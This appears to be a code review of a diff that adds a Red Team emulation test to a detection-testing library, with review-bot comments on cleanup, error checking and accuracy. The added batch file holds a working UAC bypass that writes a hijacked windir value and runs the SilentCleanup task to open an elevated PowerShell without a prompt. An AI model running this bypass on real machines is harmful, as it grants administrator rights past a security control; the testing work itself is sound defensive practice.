reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
name: command_prompt
elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: |
+ #{file_path}
+ name: command_prompt
+ elevation_required: false
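Review bot: The new test has no `cleanup_command`, yet the bat it runs writes a persistent `windir` value under `HKCU\Environment` and only removes it on its last line, so an interrupted or failed run leaves the user's `%windir%` pointing at the injected command for any later process that picks up the user environment. Add `cleanup_command: |` followed by `reg delete "HKCU\Environment" /v "windir" /F >nul 2>&1` under the executor so the runner restores the value regardless of how the bat exits. The description does not match the implementation: it says the value is set to `"cmd /k REM "` while `src/T1548.002.bat` writes `cmd /c start powershell&REM `, and `registry kye` should be `registry key`. `file_path` is declared `type: String`; `T1027.yaml` in this same diff uses `type: path` for a file argument, so `path` is the consistent choice.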
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat
new file mode 100644
index 00000000..d873b527
--- /dev/null
+++ b/atomics/T1548.002/src/T1548.002.bat
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F
\ No newline at end of file
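Review bot: Every step in the new script discards its output with `>nul` and nothing checks `%errorlevel%`, so when `reg add` or `schtasks /run` fails (task missing or blocked by policy) the runner still reports success and the test gives no signal; at minimum drop `>nul` from the `schtasks` line, or echo `%errorlevel%` after it, while still falling through to the final `reg delete`. The value written is `cmd /c start powershell&REM `, so a successful run leaves an elevated PowerShell console open with nothing in the script or the yaml to close it; state that in the test description or launch a self-terminating command instead. The two fixed `timeout` waits are the only synchronisation with the task, so results are timing-dependent, which is worth stating in the description so a negative result is not misread as a mitigated host. The file also lacks a trailing newline.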
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7d1c8c5d..409c774d 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -704,3 +704,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
788e0019-a483-45da-bcfe-96353d46820f
58004e22-022c-4c51-b4a8-2b85ac5c596b
0b2f9520-a17a-4671-9dba-3bd034099fff
+28104f8a-4ff1-4582-bcf6-699dce156608
+46f8dbe9-22a5-4770-8513-66119c5be63b